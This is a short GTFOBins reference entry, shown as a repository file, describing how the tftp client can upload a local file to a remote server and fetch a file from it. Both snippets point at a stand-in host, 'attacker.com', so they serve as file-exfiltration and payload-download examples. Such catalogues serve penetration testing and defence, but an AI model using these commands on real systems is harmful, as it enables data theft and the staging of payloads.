GTFOBins.github.io/_gtfobins/tftp.md
2018-07-04 19:26:52 +01:00

16 lines
304 B
Markdown

---
functions:
upload:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
put file_to_send
download:
- description: Fetch a remote file from a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
get file_to_get
---